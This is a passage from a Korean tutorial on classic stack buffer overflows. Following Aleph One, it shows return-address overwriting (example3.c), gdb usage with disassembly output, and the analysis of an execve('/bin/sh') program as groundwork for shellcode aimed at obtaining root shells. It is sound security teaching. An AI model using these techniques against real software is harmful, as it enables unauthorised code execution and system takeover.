47 낮은메모리주소 buffer [ ] sfp [ ] ret [ ] *str [ ] 높은메모리주소 스택의꼭대기 스택의 바닥 이제좀더자세히앞의소스를살펴보자. 먼저왜세그멘테이션오류가발생하는가? 이미수차례살펴보았듯이 strcpy() 함수는널문자가스트링에서발견될때까지 buffer[] 에 *str(large_string[]) 의내용을복사한다. 소스에서도볼수있듯이 buffer[] 의크기는 *str보다휠씬더작다. buffer[] 의크기는 16 바이트이고, buffer[] 에 256 바이트를넣으려고한다. 이것은스택의버퍼다음에 250 바이트전체가덮어쓰인다는것을의미한다. 그래서 sfp, ret, 그리고심지어 *str까지덮어쓰게된다. 결국 A 라는문자로 large_string을가득채우게된다. A 의 16진수값은 0x41이므로, A 로덮어쓰여진리턴어드레스는 0x 이된다. 이것은리턴어드레스가 4 바이트이기때문이다. 이제함수가리턴할때세그멘테이션오류를일으킨주소 0x 로부터다음 instruction을읽으려고시도할것이고, 이것때문에세그멘테이션오류가나는것의이유이다. 여태까지알아본것을통해우리는버퍼오버플로우를통해함수의리턴어드레스를변경시킬수있다는것을알았다. 리턴어드레스가변경되면당연히프로그램의실행흐름도역시변경된다. 여기서우리가처음보았던 example1.c의경우로다시돌아가보자. 이예를통해리턴어드레스를조작하는것과임의의코드를실행할수있는방법에대해알아보도록한다. example1.c의소스코드는다음과같다 example1.c void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; void main(){ function(1,2,3); 46

48 function() 이라는함수가호출될때스택의모양을살펴보면다음과같다. 낮은 메모리주소 buffer2 buffer1 SFP ret a b c [12 byte] [8 byte] [4 byte] [4 byte] [4 byte] [4 byte] [4 byte] 높은메모리주소 스택의꼭대기 스택의 바닥 스택상에서 buffer1 앞에 SFP가있고, SFP 앞에 ret이있다. 그것은 buffer1[] 의끝에서 4 바이트거리이다. 하지만 buffer1[] 은실제 2 word이며, 그래서 8 바이트이다. 결국리턴어드레스는 buffer1[] 의시작부분부터 12 바이트가된다. 리턴값을변경하기위해 Aleph One은함수호출이 jump한후할당식 x=1; 을이용하는방식을사용하고있다. 이를위해리턴어드레스에 8 바이트를추가하고, 코드는다음과같다 example3.c void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1+12; (*ret)+=8; void main(){ int x; x=0; 47

49 function(1,2,3); x=1; printf( %d\n,x); example1.c과 example3.c와다른점은 example3.c에서는 buffer1[] 의주소에 12를더한것이다 (ret = buffer1+12;). 이새로운어드레스는리턴어드레스가저장되어있는곳이기도하다. buffer1에서 ret까지의거리가 12가된다는것을앞에서도살펴본바다. 그리고우리는 printf 콜에대한할당을지나스킵하기를원한다. 그런데리턴어드레스에 8을더하는것을어떻게알았는가? 이것은 gdb를이용해알아낼수있다 [aleph1]$ gdb example3 GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... disassemble main Dump of assembler code for function main: 0x <main>: pushl %ebp /* procedure prolog */ 0x <main+1>: movl %esp,%ebp 0x <main+3>: subl $0x4,%esp /* 정수형변수 x 를위한공간확보 */ 0x <main+6>: movl $0x0,0xfffffffc(%ebp) /* x=0; */ 0x800049d <main+13>: pushl $0x3 /* function(1,2,3); 파라미터 push */ 0x800049f <main+15>: pushl $0x2 0x80004a1 <main+17>: pushl $0x1 0x80004a3 <main+19>: call 0x <function> /* function(); 호출 */ 0x80004a8 <main+24>: addl $0xc,%esp /* function(int a, int b, int c) */ 0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp) /* x=1; ebp-4(x) 에 1 복사 */ 48

50 0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax /* x=1; ebp-4(x) 을 eax로복사 */ 0x80004b5 <main+37>: pushl %eax /* x=1; 스택에복사 */ 0x80004b6 <main+38>: pushl $0x80004f8 0x80004bb <main+43>: call 0x <printf> /* printf(); 호출 */ 0x80004c0 <main+48>: addl $0x8,%esp 0x80004c3 <main+51>: movl %ebp,%esp /* procedure epilog */ 0x80004c5 <main+53>: popl %ebp 0x80004c6 <main+54>: ret 0x80004c7 <main+55>: nop function() 을호출할때 RET이 0x8004a8이된다는것을알수있으며, 0x80004ab에있는할당식을지나 jump하기를원한다. 우리가실행하고자원하는다음 instruction은 0x80004b2이다. 이둘사이의거리는 0x80004b2 0x80004ab = 7 처럼간단한계산을통해 8이라는것을알수있다. 49

51 Shell Code 앞장에서살펴본것은오버플로우취약점을이용해리턴어드레스를변조하여우리가원하는코드를실행하고, 이것을통해프로그램의실행흐름을바꿀수있다는것이었다. 그럼여기서 우리가실행하고자원하는코드 는무엇인가? 대부분쉘을실행하는쉘코드이다. 쉘을우리가획득하게되면, 특히루트쉘을획득하게되면우리가원하는작업은무엇이든할수있게된다. 그럼우리에게남은것은어떻게쉘코드를만들것이며, 그쉘코드를취약한프로그램의특정주소에쉘코드를어떻게위치시킬것인가이다. 먼저간단히말한다면, 덮어쓰고자하는버퍼에우리가실행하고자하는쉘코드를넣고, 취약한프로그램의특정리턴어드레스를덮어쓰고, 그것이버퍼내에있는쉘코드의리턴어드레스를가리키게하면쉘을실행할수있다. 이것에대해서는나중에다시더자세히알아볼것이다. 이제쉘코드를어떻게만들것인지에대해알아보도록하자. Aleph One의글에나오는것을보면쉘코드를만드는것이결코만만치않다는겁부터먹을수있다. 그러나쉘코드를만드는방법은 Aleph One의글이후로많은발전을보였으며, 쉘코드의종류역시다양해졌다. 그모든방법을여기서모두언급할수없을정도이다. 그래서이글에서는먼저 Aleph One의글에나오는것을원문에충실하게설명한후, 최근시스템에그대로적용시키켜쉘코드를만들고, 그런다음쉘코드를만드는간단한방법에대해서설명하도록하겠다. 다양한쉘코드에대해더많은것을알고싶은독자들은프랙에발표된다양한쉘코드관련글들을참고하길바란다. 쉘코드를만들때는먼저가장필수적인사전지식이 gdb 사용법과기초적인어셈블리어지식이다. 적어도어셈블리어에서사용되는명령어들만이라도철저하게이해를하도록해야한다. 앞에서도 Intel x86 Assembly OPCode를제시했었는데, 이정도는알고있어야될것이다. 쉘코드를만들어보기전에독자들은다시한번어셈블리어명령어에대해공부하도록하자. 이설명글에서는간단한 comment를붙이는정도가될것이다. 쉘코드를만들기전에알아야할것중하나가 gdb의사용법이라고했는데, 여기에대해서간단히알아보도록하자. 더상세한것은 gdb의매뉴얼 16 을참고하길바란다. 아래내용은필자가전에 Red Hat 7.1을이용해정리해둔것이다. 우선가장기본적인 GDB의사용법부터알아보자. GDB를실행시키기위해다음과같이프롬프트상에 "gdb" 명령을내리면된다. gdb]$ gdb 16 참고 50

52 GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... 그리고여기서빠져나오기위해서는 "quit" 나 "q" 를입력하거나또는 Ctrl-d 를누르면된다. quit gdb]$ "gdb" 명령을통해 GDB를실행시키면터미널로명령을받아들일준비가갖추어진다. 이때디버깅환경에대해더많은것을지정하기위해다양한인수와옵션을사용할수있다. 가장일반적으로사용하고있는것은실행가능한프로그램이름을지정하여 GDB를실행하는것이다. gdb]$ gdb program 또한실행중인프로세스를디버깅하고자한다면두번째인수로서프로세스 ID 를지정할수 있다. gdb]$ gdb program 1234 각종옵션에대해서는 "gdb -h" 명령을내려확인해볼수있다. gdb]$gdb -h This is the GNU debugger. Usage: gdb [options] [executable-file [core-file or process-id]] 51

53 gdb [options] --args executable-file [inferior-arguments...] Options: --args Arguments after executable-file are passed to inferior --[no]async Enable (disable) asynchronous version of CLI -b BAUDRATE Set serial port baud rate used for remote debugging. --batch Exit after processing options. --cd=dir Change current directory to DIR. --command=file Execute GDB commands from FILE. --core=corefile Analyze the core dump COREFILE. --pid=pid Attach to running process PID. --dbx DBX compatibility mode. --directory=dir Search for source files in DIR. --epoch Output information used by epoch emacs-gdb interface. --exec=execfile Use EXECFILE as the executable. --fullname Output information used by emacs-gdb interface. --help Print this message. --interpreter=interp Select a specific interpreter / user interface --mapped Use mapped symbol files if supported on this system. --nw Do not use a window interface. --nx Do not read.gdbinit file. --quiet Do not print version number on startup. --readnow Fully read symbol files on first access. --se=file Use FILE as symbol file and executable file. --symbols=symfile Read symbols from SYMFILE. --tty=tty Use TTY for input/output by the program being debugged. --version Print version information and then exit. -w Use a window interface. --write Set writing into executable and core files. --xdb XDB compatibility mode. For more information, type "help" from within GDB, or consult the GDB manual (available as on-line info or a printed manual). Report bugs to "[email protected]". 이제부터필수적인부분에대해알아보도록하자. GDB 환경에서프로그램을실행하기위해서는 r(run) 명령은내리면된다. 예를들어다음과 같은간단한프로그램을작성해 GDB 환경에서실행해보자 test1.c #include <stdio.h> main() { char ch[20]; 52

54 printf("put some words. n"); gets(ch); printf("%s n",ch); gdb]$gdb test1 GNU gdb Red Hat Linux (5.1.90CVS-5) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... r Starting program: /home/vangelis/gdb/test1 Put some words. Wowhacker! Wowhacker! Program exited with code 04. 이제 breakpoint에대해알아보자. breakpoint는프로그램에서어떤지점에도달할때마다프로그램이멈추도록하는것이다. 각각의 breakpoint에대해, 프로그램이멈추어야할지말아야할지를좀더세밀하게통제하기위해어떤조건을추가할수있다. 여기에서사용되는옵션은라인넘버, 함수명, 정확한주소를지정하여프로그램이멈추어야할곳을지정하기위해 break라는명령과그것의변수로 breakpoint를설정할수있다. 이제좀더자세히 breakpoint를설정하는것에대해알아보자. breakpoint는 break 명령또는축약형 b를사용해설정한다. 어디에 breakpoint를걸어야할지에대한방법은몇가지가있다. 차례대로하나씩알아보도록하겠다. 53

55 break 함수 특정함수에대한엔트리에 breakpoint 를설정하는것이다. 다음예를살펴보자. 다음예는 먼저 main 부분을 disassemble 했다. disass main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: sub $0x28,%esp 0x <main+6>: sub $0xc,%esp 0x <main+9>: push $0x80484e8 0x804844e <main+14>: call 0x <printf> 0x <main+19>: add $0x10,%esp 0x <main+22>: sub $0xc,%esp 0x <main+25>: lea 0xffffffd8(%ebp),%eax 0x804845c <main+28>: push %eax 0x804845d <main+29>: call 0x80482f4 <gets> 0x <main+34>: add $0x10,%esp 0x <main+37>: sub $0x8,%esp 0x <main+40>: lea 0xffffffd8(%ebp),%eax 0x804846b <main+43>: push %eax 0x804846c <main+44>: push $0x80484f9 0x <main+49>: call 0x <printf> 0x <main+54>: add $0x10,%esp 0x <main+57>: leave 0x804847a <main+58>: ret 0x804847b <main+59>: nop 0x804847c <main+60>: nop 0x804847d <main+61>: nop 0x804847e <main+62>: nop 54

56 0x804847f <main+63>: nop End of assembler dump. break printf Breakpoint 1 at 0x 여기서는 printf 라는함수에 breakpoint 를설정하고있다. 이제함수의주소를이용해 breakpoint 를설정해보자. 주소에 breakpoint 를설정할때는주소앞에 "*" 를붙여준다. b *0x Breakpoint 1 at 0x breakpoint 를해제하는방법은 clear 를사용하면된다. clear printf Deleted breakpoint 3 몇몇운영체제에서는 breakpoint가사용될수없는경우가있는데, 이경우는어떤다른프로세스가 breakpoint를설정하고자하는프로그램을실행시키고있을경우이다. 이경우 "Cannot insert breakpoints." 라는메세지가뜬다. 이경우 breakpoint를제거한후다시시도를해본다. 이밖에 breakpoint에대한많은내용들이있으나필수적인부분만살펴보았다. 좀더자세한내용을알고자원한다면 GDB 매뉴얼페이지를찾아보길바란다. 이제 continuing에대해서알아보도록하겠다. continuing는프로그램이정상적으로종료할때까지프로그램의실행을재개하는것을의미한다. 이것은간단히 c (continue) 명령을내리기만하면된다. GDB의유용성들중의하나는우리가스택의내용을살펴보면서, 특정함수의리턴어드레스나레지스터의정보를알아볼수있다는것이다. 프로그램에서데이터를알아보는일반적인방법은 'p'(print) 명령이나 inspect를사용하는것이다. 이것은프로그램이쓰여진언어의표현값을출력한다. 방법은 'print expr' 이다. 여기서 expr은소스언어에서 55

57 표현식이다. 디폴트로 expr의값은데이터의타입에맞게포맷으로출력된다. 특정한포맷을지정하고자한다면 `/ f' 옵션을사용한다. 여기서 f는포맷을지정하는것이다. 즉, 'print(p) / f expr' 의형태로사용한다. 데이터를살펴보는또다른방법은 'x' 명령을사용하는것이다. 이것은지정된주소의메모리에있는데이터를살펴보고, 특정한포맷으로그데이터를출력한다. 이제부터출력되는포맷들에대해알아보자. 디폴트로 GDB는프로그램의데이터타입에따라값을출력한다. 그러나이것이우리가바라는것이아닐수있다. 예를들어, 16진수로수를출력하고싶거나, 또는십진수로포인터를출력하고싶을때가있을수도있다. 그리고어떤특정주소에있는메모리의데이터를문자열로볼필요가있을수있다. 이것을위해어떤값을출력할때출력되는포맷을지정하면된다. 출력포맷 (output format) 의가장단순한사용은이미연산된값을어떻게출력할것인가를지정하는것이다. 이것은 print 명령을슬래쉬와포맷문자를덧붙여사용하는것이다. 지원되는포맷은다음과같다. x - 16진수의형태로정수 (integer) 를출력 d - signed형십진수로정수를출력 u - unsigned형십진수로정수를출력 o - 8진수 (octal) 로정수를출력 t - 이진수 (binary) 형태로정수를출력. 여기서 t는 'two' 를의미한다. a - 어드레스의형태로출력. 이포맷을이용해어떤함수에서모르는어드레스의위치를알아낼때사용할수있다. c - 문자형상수로출력 f - float형소수점형태로출력 이제다음 Aleph One 의소스를이용해서각각의포맷을사용했을때출력된형태를살펴보자 t3.c #include <stdio.h> void function(char *str) { char buffer[16]; strcpy(buffer,str); 56

58 void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); [vangelis@localhost test]# gdb t3 GNU gdb Red Hat Linux (5.1.90CVS-5) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... disas main Dump of assembler code for function main: 0x804841c <main>: push %ebp 0x804841d <main+1>: mov %esp,%ebp 0x804841f <main+3>: sub $0x118,%esp 0x <main+9>: nop 0x <main+10>: movl $0x0,0xfffffef4(%ebp) 0x <main+20>: cmpl $0xfe,0xfffffef4(%ebp) 0x804843a <main+30>: jle 0x <main+36> 0x804843c <main+32>: jmp 0x804845c <main+64> 0x804843e <main+34>: mov %esi,%esi 0x <main+36>: lea 0xfffffef8(%ebp),%eax 0x <main+42>: mov %eax,%edx 0x <main+44>: mov 0xfffffef4(%ebp),%eax 0x804844e <main+50>: movb $0x41,(%eax,%edx,1) 57

59 0x <main+54>: lea 0xfffffef4(%ebp),%eax 0x <main+60>: incl (%eax) 0x804845a <main+62>: jmp 0x <main+20> 0x804845c <main+64>: sub $0xc,%esp 0x804845f <main+67>: lea 0xfffffef8(%ebp),%eax 0x <main+73>: push %eax 0x <main+74>: call 0x <function> 0x804846b <main+79>: add $0x10,%esp 0x804846e <main+82>: leave 0x804846f <main+83>: ret End of assembler dump. b main Breakpoint 1 at 0x r Starting program: /home/vangelis/test/t3 Breakpoint 1, 0x in main () x/x function 0x <function>: 0x83e58955 이것은 main 함수부분을 disassemble 해서나온결과이며, function 이라는함수부분을살펴본 것이다. 슬래쉬다음에출력수를지정할수도있다. x/10x function 0x <function>: 0x83e xec8318ec 0x0875ff08 0x50e8458d 0x <function+16>:0xfffedbe8 0x10c483ff 0xf689c3c9 0x81e x <main+4>: 0x000118ec 0x85c79000 여기서 x/10x 부분에 10x 에서 x 를없애도같은값이출력된다. 이것은디폴트로지정된것 때문이다. x/10 function 58

60 0x <function>: 0x83e xec8318ec 0x0875ff08 0x50e8458d 0x <function+16>:0xfffedbe8 0x10c483ff 0xf689c3c9 0x81e x <main+4>: 0x000118ec 0x85c79000 이제선택한프레임에대한정보를알아보기위해사용하는 info에대해알아보기로한다. info 명령을사용할때주로 f 옵션을사용한다. 여기서 f는프레임 (frame) 을의미한다. 다음은프레임의주소를사용해 info 명령을내린것이다. 스택프레임의주소, eip, 선택한프레임의 argument를의미하는 arg, 지역변수, ebp 등의정보가자세하게출력되었다. info f 0x804841c Stack frame at 0x804841c: eip = 0x0; saved eip 0x118ec (FRAMELESS), called by frame at 0x804841c Arglist at 0x804841c, args: Locals at 0x804841c, Previous frame's sp is 0x0 Saved registers: ebp at 0x804841c, eip at 0x 다음은소스에서사용한함수이름을옵션으로붙인것이다. info f function Stack frame at 0x : eip = 0x0; saved eip 0xec8318ec (FRAMELESS), called by frame at 0x Arglist at 0x , args: Locals at 0x , Previous frame's sp is 0x0 Saved registers: ebp at 0x , eip at 0x 다음은위의함수의주소를이용해 info 명령을내린것으로위와같은결과가나왔다. 59

61 info f 0x Stack frame at 0x : eip = 0x0; saved eip 0xec8318ec (FRAMELESS), called by frame at 0x Arglist at 0x , args: Locals at 0x , Previous frame's sp is 0x0 Saved registers: ebp at 0x , eip at 0x 몇가지예를더보자. info f main+74 Stack frame at 0x : eip = 0x0; saved eip 0x10c483ff (FRAMELESS), called by frame at 0x Arglist at 0x , args: Locals at 0x , Previous frame's sp is 0x0 Saved registers: ebp at 0x , eip at 0x804846a info f 0x Stack frame at 0x : eip = 0x0; saved eip 0x10c483ff (FRAMELESS), called by frame at 0x Arglist at 0x , args: Locals at 0x , Previous frame's sp is 0x0 Saved registers: ebp at 0x , eip at 0x804846a 다음은레지스터의각종정보를알아보는것이다. info reg 60

62 eax 0x1 1 ecx 0x42130f edx 0xbffffb9c ebx 0x c esp 0xbffffa10 0xbffffa10 ebp 0xbffffb28 0xbffffb28 esi 0x edi 0xbffffb eip 0x x eflags 0x cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 fctrl 0x37f 895 fstat 0x0 0 ftag 0xffff fiseg 0x23 35 fioff 0x400568f foseg 0x2b 43 fooff 0xbffffa fop 0x77d 1917 xmm0 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm1 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm2 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm3 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm4 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm5 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 xmm6 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 61

63 xmm7 {f = {0x0, 0x0, 0x0, 0x0 {f = {0, 0, 0, 0 mxcsr 0x1f orig_eax 0xffffffff -1 대충 gdb의기본적인사용법에대해알아보았다. 이것이외도많은부분이있으나나머지는매뉴얼을참고바란다. 이제부터본격적으로 Aleph One의글에나오는쉘코드만드는방법에대해알아보자. 쉘을스포닝 (spawning) 하는코드는다음과같다 shellcode.c #include <stdio.h> void main(){ char *name[2]; name[0]= /bin/sh ; name[1]=null; execve(name[0],name,null); 위의소스를컴파일하여어떤과정을거치는지알아보자. 컴파일할때는 -static 플래그를사용해야하는데, 이것은 execve 시스템콜을위한실제코드가포함되지않을수있기때문이다. -static 플래그를사용하지않을경우로딩시보통링크되는동적 C 라이브러리에대한참조만된다. 다시한번말하지만먼저 Aleph One의글에나오는내용그대로를인용하여설명한후최근시스템의결과를제시하여다시설명하고, 좀더간단한방법을이용해쉘코드를만들어볼것이다. 다음은 Aleph One의글에나오는결과이다 [aleph1]$ gcc -o shellcode -ggdb -static shellcode.c [aleph1]$ gdb shellcode GDB is free software and you are welcome to distribute copies of it 62

64 under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... disassemble main Dump of assembler code for function main: 0x <main>: pushl %ebp 0x <main+1>: movl %esp,%ebp 0x <main+3>: subl $0x8,%esp 0x <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x <main+20>: pushl $0x0 0x <main+22>: leal 0xfffffff8(%ebp),%eax 0x <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax 0x800014e <main+30>: call 0x80002bc < execve> 0x <main+35>: addl $0xc,%esp 0x <main+38>: movl %ebp,%esp 0x <main+40>: popl %ebp 0x <main+41>: ret End of assembler dump gdb 를이용한결과를보며쉘을실행하는코드에어떤일이일어나고있는지그과정을 알아보자. 먼저 main() 함수부분을살펴보자. 0x <main>: pushl %ebp 0x <main+1>: movl %esp,%ebp 0x <main+3>: subl $0x8,%esp 이부분은 procedure prelude 또는 procedure prolog라고앞에서알아보았다. 혹시라도이해가안되는독자는앞부분을다시읽어보기바란다. 간단히설명하면, 이전프레임포인터인 ebp를저장하고, 그런다음현재의스택포인터를새로운프레임포인터로만든다. 그리고로컬변수를위한공간을확보한다. 여기서 8 바이트를확보하는것은로컬변수선언부분에서 char형포인터 *name[2] 는 *name[0] 과 *name[1] 를의미하며, 포인터는변수의주소값을가리키는것으로, 주소값은 4 바이트 (1 word) 로되어있다. 그래서 2개의포인터는 8 바이트의공간을필요로하게된다. 참고로위의 gdb를통한결과를보면앞에 $ 와 % 가붙어있는것을 63

65 볼수있을것이다. $ 가붙은것은값을의미하고, % 가붙은것은주소를나타낸다. 0x <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 이것은스택포인터에확보된로컬변수의공간에있는주소, 즉포인터 name[0] 이가리키고있는주소 ebp - 0xfffffff8(-0x8) 에문자열 "/bin/sh" 의주소값인 0x80027b8를복사한다. 이것은위의소스에서 name[0] = /bin/sh 를처리하는것이다. 여기서 0xfffffff8(%ebp) 에대해간단히설명하겠다. 이것은 값 ( 레지스터 ) 로되어있고, 레지스터 + 값 의주소를의미하므로, 0xfffffff8은 0x8이고, ebp로부터 8 바이트떨어져 있으므로결국그값은 ebp-8 이되고, 따라서 name[0] 을가리키게된다. 위소스의 메모리 구조를살펴보면다음과같고, name[0] 은 ebp 로부터 8 바이트떨어져있는것을알수있다. [ name[0] ][ name[1] ][ ebp ][ ret ] ^ ^ _[ ebp-4 ] _[ ebp-8 ] 주소값은 4 바이트로되어있기때문에 name[0] 은 ebp 즉, sfp 로부터 8 바이트떨어져있는 것이다. 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 이것은 NULL 값인 0x0을포인터 name[1] 이가리키고있는주소 ebp - 0xfffffffc(-0x4) 에복사하는것으로서, name[1]=null; 을처리하는것이다. 이것은바로앞에서보았던위소스의메모리구조에대한도표를보면쉽게이해가될것이다. 로컬변수의데이터값을처리하면이제본격적으로 execve() 17 함수의호출이시작된다. 17 execve() 함수의시놉시스는다음과같다. #include <unistd.h> int execve(const char *filename, char *const argv [], char *const envp[]); execve() 함수는위의시놉시스에서나오는 filename 이가리키는프로그램을실행하고, 이프로그램은실행가능한바이너리이거나쉘스크립트여야한다. argv 는새로운프로그램에전달되는아규먼트인문자열의배열이며, envp 는새로운프로그램에대한환경변수로서전달되는문자열배열이다. argv 와 envp 는널포인터로종료되어야한다. 좀더자세한것은맨페이지를참고하길바란다. 64

66 0x <main+20>: pushl $0x0 이제 execve() 에대한아규먼트들을앞에서살펴보았던스택의특성에따라스택에역순으로 push 하는데, 먼제 NULL 부터시작한다. execve() 함수의아규먼트는아래각주에나오는 시놉시스를참고하길바란다. 0x <main+22>: leal 0xfffffff8(%ebp),%eax name[] 의주소 ebp - 0xfffffff8(-0x8) 를 eax 레지스터에로딩한다. 여기서 leal이라는 instruction은 lea와같은것으로, -static이라는플래그를사용해서컴파일했기때문이며, 이것은앞에서도알아보았다. lea는 load effective address의줄임말로, 유효한주소 offset을계산하여레지스터에로딩한다. 이 instruction은단지 32 비트오퍼랜드와만사용될수있다. 참고로 lea는 CPU에의해유효한주소를계산하는과정에서반복과시간을소비하는것을피하기위해제공된 instruction이다. 0x <main+25>: pushl %eax name[] 의주소를스택에 push 한다. 앞에서 Intel x86 Assembly OPCodes 라는표에서도 보았듯이, push 는스택 instruction 이다. 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 문자열 "/bin/sh" 의주소값이있는 ebp 0x8(0xfffffff8) 의값을 eax 레지스터에 이동시킨다. 0x800014d <main+29>: pushl %eax 문자열 "/bin/sh" 의주소를스택에 push 한다. 0x800014e <main+30>: call 0x80002bc < execve> 함수를호출하기위해필요한데이터가스택에저장되면이제 execve() 함수를호출한다. call instruction 은스택에 IP(instruction pointer) 도역시 push 한다. 이때스택에저장된 IP 를리턴 어드레스 (RET, return address) 라부르다고앞에서알아보았던내용이다. 65

67 이제 execve() 함수부분을알아보자. 다시말하지만 Aleph One 이사용한시스템은 Intel 기반의리눅스시스템이었다. 이런전제를다시확인하는것은시스템호출 (system call) 18 이 운영체계나 CPU 마다다르기때문이다. 어떤것은스택에아규먼트를, 다른것은레지스터에 아규먼트를건네준다. 커널모드로들어가기위해어떤것은 software interrupt 19 를, 다른것은 far call 을이용한다. 리눅스는레지스터상에있는시스템호출에대해아규먼트를건네주고, 커널모드로 jump 하기위해 software interrupt 를사용한다. 다음은 execve() 함수를디스어셈블링한것이다 disassemble execve Dump of assembler code for function execve: 0x80002bc < execve>: pushl %ebp 0x80002bd < execve+1>: movl %esp,%ebp 0x80002bf < execve+3>: pushl %ebx 0x80002c0 < execve+4>: movl $0xb,%eax 0x80002c5 < execve+9>: movl 0x8(%ebp),%ebx 0x80002c8 < execve+12>: movl 0xc(%ebp),%ecx 0x80002cb < execve+15>: movl 0x10(%ebp),%edx 0x80002ce < execve+18>: int $0x80 0x80002d0 < execve+20>: movl %eax,%edx 0x80002d2 < execve+22>: testl %edx,%edx 0x80002d4 < execve+24>: jnl 0x80002e6 < execve+42> 0x80002d6 < execve+26>: negl %edx 0x80002d8 < execve+28>: pushl %edx 0x80002d9 < execve+29>: call 0x8001a34 < normal_errno_location> 0x80002de < execve+34>: popl %edx 0x80002df < execve+35>: movl %edx,(%eax) 0x80002e1 < execve+37>: movl $0xffffffff,%eax 0x80002e6 < execve+42>: popl %ebx 0x80002e7 < execve+43>: movl %ebp,%esp 0x80002e9 < execve+45>: popl %ebp 0x80002ea < execve+46>: ret 0x80002eb < execve+47>: nop End of assembler dump 시스템콜은 primitive 라고도하는데, 커널내에상주하는 low level 함수들이다. 이함수들은시스템제어를위한기본적인기능을포함하고있다. 보통리눅스에서는커널모드로들어가기위해 int 0x80 을시스템콜로사용한다. 이것이사용되면 interrupt 0x80 이실행된다. 19 Interrupt 에대해서는프랙 59 호에발표된 Handling Interrupt Descriptor Table for fun and profit 라는글을참고하길바란다. Interrupt 에대해서 O'Reilly 에서출판된 Understanding the Linux kernel 이라는책에서 " 프로세서 (processor) 에의해실행되는 instruction 의시퀸시를변경하는이벤트 " 라고정의되어있다. 참고로, 리눅스매니아를위한커널프로그래밍 ( 조유근외 2 명지음, 교학사 ) 이라는책에도 interrupt 에대해비교적자세히설명되어있다. 66

68 위의결과를자세히살펴보자. 0x80002bc < execve>: pushl %ebp 0x80002bd < execve+1>: movl %esp,%ebp 0x80002bf < execve+3>: pushl %ebx 먼저이것은 procedure prolog 라는것을이제쉽게알수있을것이다. 0x80002c0 < execve+4>: movl $0xb,%eax eax 레지스터에 11(16 진수로 0xb) 을복사한다. 참고로 eax 레지스터는프로시저에데이터를 전달하고, 프로시저로부터호출하는코드로데이터를리턴하기위해사용된다. 여기서 전달되는값인 0xb는리눅스 syscall 테이블에서보면 execve를가리킨다는것을알수있다. 리눅스 syscall table은리눅스커널에대한시스템호출목록이라고생각하면된다. 또한사용자공간과커널공간사이의인터페이스를위한 API로써간주될수있다. syscall에대한번호는 /usr/src/linux-버전/arch/i386/kernel/entry.s에자세하게나와있다. 여기서는 entry.s 파일의일부를발췌한다. 전체파일의내용은직접독자의시스템에서확인하길바란다. 아래의파일내용중파란색으로표시한부분이 execve에대한것이다 /* * linux/arch/i386/entry.s * * Copyright (C) 1991, 1992 Linus Torvalds */ /* * entry.s contains the system-call and fault low-level handling routines. * This also contains the timer-interrupt handler, as well as all interrupts * and faults that can result in a task-switch. * * NOTE: This code handles signal-recognition, which happens every time 67

69 * after a timer-interrupt and after each system call. * * I changed all the.align's to 4 (16 byte alignment), as that's faster * on a 486. * * Stack layout in 'ret_from_system_call': * ptrace needs to have all regs on the stack. * if the order here is changed, it needs to be * updated in fork.c:copy_process, signal.c:do_signal, * ptrace.c and ptrace.h * * 0(%esp) - %ebx * 4(%esp) - %ecx * 8(%esp) - %edx * C(%esp) - %esi * 10(%esp) - %edi * 14(%esp) - %ebp * 18(%esp) - %eax * 1C(%esp) - %ds * 20(%esp) - %es * 24(%esp) - orig_eax * 28(%esp) - %eip * 2C(%esp) - %cs * 30(%esp) - %eflags * 34(%esp) - %oldesp * 38(%esp) - %oldss * * "current" is in register %ebx during any slow entries. */ #include <linux/config.h> #include <linux/sys.h> 68

